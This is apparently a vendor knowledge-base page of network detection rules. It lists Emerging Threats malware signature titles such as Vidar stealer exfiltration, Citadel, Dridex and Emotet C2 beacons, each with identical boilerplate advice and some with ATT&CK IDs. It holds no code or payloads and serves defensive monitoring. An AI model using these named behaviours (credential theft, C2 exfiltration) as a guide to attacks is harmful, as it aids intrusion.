This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE VBS.ARS Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE VBS/Dojos Downloader Activity M2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE VBS/TrojanDownloader.Agent.SEB Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE VBS/TrojanDownloader.Agent.SEB Keep-Alive

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE VBS/TrojanDownloader.Agent.SEB Reporting Network Info

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE VBS/Wimmie.A Set

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE VBulletin Backdoor C2 URI Structure

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE VBulletin Backdoor CMD inbound

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE VenusLocker Activity

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE VenusLocker Associated User-Agent Activity

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Vicious Panda CnC Activity

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Vidar/Arkei/Megumin/Oski Stealer HTTP POST Pattern

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Vidar/Arkei Stealer Client Data Upload

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE VikroStealer CnC Exfil

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE VikroStealer Retrieving Config

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ViperSoftX CnC Activity M1

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ViperSoftX CnC Activity M2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE VirTool.Win32/VBInject.gen!DM Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Virtumod/Agent.ufv/Virtumonde Get Request

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Virtumonde Variant Reporting to Controller via HTTP (3)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Virusremover2008.com Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Virut Counter/Check-in

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Virut Family GET

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Vobfus Check-in

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE VoidRay Downloader CnC Activity

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Volatile Cedar Win32.Explosive Fake User-Agent

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Volatile Cedar Win32.Explosive HTTP CnC Beacon 1

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Volex - OceanLotus JavaScript Load (connect.js)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE VPNFilter htpx Module C2 Request

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE vSkimmer.PoS Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Vundo User-Agent Check-in

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W2KM_BARTALEX August 11 2015

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W2KM_BARTALEX Downloading Payload 2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W2KM_BARTALEX Downloading Payload M2 (set)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/118GotYourNo Reporting to CnC

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/24x7Help.ScareWare CnC Beacon

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE W32/Adrom.Backdoor CnC Beacon

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE W32/Agent.XXZBEN Downloader Activity

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/Alina.POS-Trojan Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/AntiBreach Possible Activation Attempt

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/Antifulai.APT CnC Beacon 1

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE W32/Antifulai.APT CnC Beacon 2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE W32/Antifulai.APT CnC Beacon 3

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE W32/Antifulai.APT CnC Beacon 4

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE W32/Armageddon CnC Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/Asprox.Bot Knock Variant CnC Beacon

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE W32/Asprox.ClickFraudBot CnC Beacon

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE W32/Asprox.ClickFraudBot CnC Beacon Acknowledgement

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE W32/Asprox.ClickFraudBot POST CnC Beacon

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE W32/Asprox CnC Beacon

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE W32/Asprox.FakeAV Affiliate Second Stage Download Location Request

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/Asprox Passgrub POST CnC Beacon

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE W32/Asprox php.dll.crp POST CnC Beacon

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE W32/Backdoor.BlackMonay Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/Badur.Spy User Agent lawl

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32 Bamital or Backdoor.Win32.Shiz CnC Communication

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/BaneChant.APT Data Exfiltration POST to CnC

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/BaneChant.APT Initial CnC Beacon

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE W32/BaneChant.APT Winword.pkg Redirect

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/Banload.VZS Banker POST CnC Beacon 1

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE W32/Banload.VZS Banker POST CnC Beacon 2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE W32/Bapy.Downloader PE Download Request

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/Beebus HTTP POST CnC Beacon

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE W32.Berbew Check-in

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/Bilakip.A Downloader API Ping CnC Beacon

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE W32/Bilakip.A Downloader Viruslist Download For Populating FakeAV

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/Bingoml!tr CnC Activity

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/BlackEnergy Dirconf CnC Beacon

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE W32.Blackshades/Shadesrat Backdoor CnC Beacon

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE W32/Bravix.Dropper CnC Beacon

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE W32/Briba CnC POST Beacon

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE W32/Caphaw CnC Configuration File Request

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/Caphaw Requesting Additional Modules From CnC

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/Citadel.Arx Variant CnC Beacon 1

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE W32/Citadel.Arx Varient CnC Beacon 2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE W32/Citadel Conf.bin Download From CnC Server

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/Citadel Content.php CnC POST

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/Citadel Download From CnC Server /files/ attachment

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/Citadel File.php CnC POST

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/Citadel Infection or Config URL Request

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/Citadel Pro File.php CnC POST

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/Coced.PasswordStealer User-Agent 5.0

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/Coinminer.Backdoor CnC Beacon

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Resource Hijacking - T1496

ET MALWARE W32/Dadobra.Downloader/DNSChanger Dnsmake CnC Beacon

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE W32.Daws/Sanny CnC Initial Beacon

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE W32/DelfInject.A CnC Checkin 2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/Depyot.Downloader CnC Beacon

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE W32/Dexter Infostealer CnC POST

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/DirCrypt.Ransomware CnC Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Encrypted for Impact - T1486

ET MALWARE W32/DownloaderAgent.fajk Second Stage Download List Requested

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/DownloaderAgent.fajk Successful Infection CnC Beacon

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE W32/Downloader.FakeFlashPlayer Status.Php CnC Beacon

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE W32/Downloader.Mevade.FBV CnC Beacon

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE W32/Downloader Secondary Download Request - W32/Hupigon.Backdoor Likely Secondary Payload

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32.Downloader Tibs.jy Reporting to C&C (2)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/Downloader_x.EJK!tr CnC Activity

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/Downvision.A Initial Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32.Dreambot File Upload (No Data Sent)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/Dridex Binary Download Mar 23 2016

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/Dridex POST CnC Beacon

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE W32/Echmark CnC Activity M2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/Echmark/MarkiRAT CnC Activity M3

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/Echmark/MarkiRAT CnC Host Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/Echmark/MarkiRAT CnC Request

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/Emotet CnC Beacon 1

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE W32/Emotet CnC Beacon 3

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/Emotet CnC Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/Emotet Empty CnC Beacon

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

